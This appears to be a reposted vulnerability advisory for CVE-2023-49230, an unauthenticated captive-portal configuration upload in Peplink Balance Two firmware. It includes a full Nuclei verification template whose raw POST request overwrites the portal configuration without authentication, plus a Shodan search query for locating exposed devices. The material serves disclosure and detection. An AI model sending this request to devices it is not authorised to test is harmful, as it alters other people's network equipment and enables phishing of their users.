Peplink Balance Two Unauthenticated Config Upload Vulnerability

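Vulnerability Information

Vulnerability name: Peplink Balance Two Unauthenticated Config Upload Vulnerability

Vulnerability ID:

  • CVE: CVE-2023-49230

Vulnerability type: Unauthorized access

Severity: High

Description: Peplink Balance Two is a widely used network load-balancing device suited to enterprise network environments, providing high availability and network traffic management. Versions before 8.4.0 contain an unauthorized-access vulnerability that lets an attacker modify the device's captive portal configuration without authenticating. The root cause is that the /guest/portal_admin_upload.cgi endpoint lacks the necessary authorization check: an attacker can modify the configuration by uploading a file, and the changes are reflected on the /guest/preview.cgi?portal_id=1 page. Because the vulnerability permits unauthorized configuration changes, an attacker could use it to make malicious changes such as altering the login page content or inserting malicious links or scripts, enabling phishing or other malicious activity against users. In addition, because configuration changes can affect the device's normal operation, an attacker could also use the vulnerability to cause a service disruption. The vulnerability has a CVSS score of 8.8, which rates it high severity, and because it can be exploited without authentication its potential impact is significant.

Vendor: peplink

Product: balance_two_firmware

Affected versions: version < 8.4.0

Search query: html:"PEPLINK"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/7959b1e38c293658610f1afb317bdcae8929e4ed/http%2Fcves%2F2023%2FCVE-2023-49230.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details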


```yaml
id: CVE-2023-49230

info:
  name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
    - https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4
    - https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-49230
    cwe-id: CWE-862
    epss-score: 0.00091
    epss-percentile: 0.27
    cpe: cpe:2.3:o:peplink:balance_two_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    shodan-query: html:"PEPLINK"
    vendor: peplink
    product: balance_two_firmware
  tags: cve,cve2023,peplink,unauth,intrusive

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/MANGA/index.cgi"

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - 'init_company_name = "Peplink"'

  - raw:
      - |
        POST /guest/portal_admin_upload.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="option"

        edit_page
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="mode"

        submit
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="portal_id"

        1
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="data"

        {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"{{randstr}}","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo_action"

        x
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo"; filename=""
        Content-Type: application/octet-stream

        -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - '"status": "save_success"'

  - raw:
      - |
        POST /guest/api.cgi HTTP/1.1
        Host: {{Hostname}}

        mode=info&option=preview&portal_id=1

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{randstr}}')"
          - 'status_code_2 == 200'
```


http://example.com/2025/07/08/github_3792944443/
Author: lianccc
Published: July 8, 2025